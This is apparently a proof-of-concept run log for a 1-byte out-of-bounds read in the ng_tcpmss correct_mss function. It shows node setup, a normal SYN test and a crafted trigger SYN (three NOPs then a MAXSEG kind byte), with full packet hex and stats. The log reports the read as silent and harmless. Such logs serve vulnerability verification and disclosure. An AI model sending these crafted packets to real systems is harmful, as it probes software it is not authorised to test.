DF-0714 / run.log
=== DF-0714: ng_tcpmss correct_mss 1-byte OOB read === [+] Created sender node (cs=3 ds=4) [+] Created receiver node (cs=5 ds=6) [+] Created tcpmss node, connected sender:data <-> tcpmss:in [+] Named tcpmss node 'tcpmss714' [+] Connected tcpmss:out <-> receiver:data [+] Configured tcpmss: maxMSS=536 --- Test 1: valid MSS SYN (MAXSEG=1460, should be lowered to 536) --- Sent (44 bytes): 45 00 00 2c 56 78 00 00 40 06 0c 44 0a 00 02 0f 0a 00 02 02 30 3a 00 50 00 00 00 02 00 00 00 00 60 02 20 00 00 00 00 00 02 04 05 b4 Received (44 bytes): 45 00 00 2c 56 78 00 00 40 06 0c 44 0a 00 02 0f 0a 00 02 02 30 3a 00 50 00 00 00 02 00 00 00 00 60 02 20 00 03 9c 00 00 02 04 02 18 MSS=536 (orig 1460, maxMSS=536) [OK] lowered Stats: Octets=44 Packets=1 maxMSS=536 SYNPkts=1 FixedPkts=1 --- Test 2: TRIGGER SYN (NOP NOP NOP MAXSEG-kind, olen=4->1) --- Drives olen to 1; *(opt+1) at ng_tcpmss.c:426 reads 1 byte OOB. Sent (44 bytes): 45 00 00 2c 12 34 00 00 40 06 50 88 0a 00 02 0f 0a 00 02 02 30 39 00 50 00 00 00 01 00 00 00 00 60 02 20 00 00 00 00 00 01 01 01 02 Received (44 bytes): 45 00 00 2c 12 34 00 00 40 06 50 88 0a 00 02 0f 0a 00 02 02 30 39 00 50 00 00 00 01 00 00 00 00 60 02 20 00 00 00 00 00 01 01 01 02 [OK] Packet forwarded through tcpmss (correct_mss was called) Stats: Octets=88 Packets=2 maxMSS=536 SYNPkts=2 FixedPkts=1 === Summary === Test 2 exercises correct_mss() with olen=1 after 3 NOPs, causing *(opt+1) at line 426 to read 1 byte past the options boundary. The read is SILENT: no panic, no leak, no corruption. The definitive proof is the code-level trace in VERDICT.md.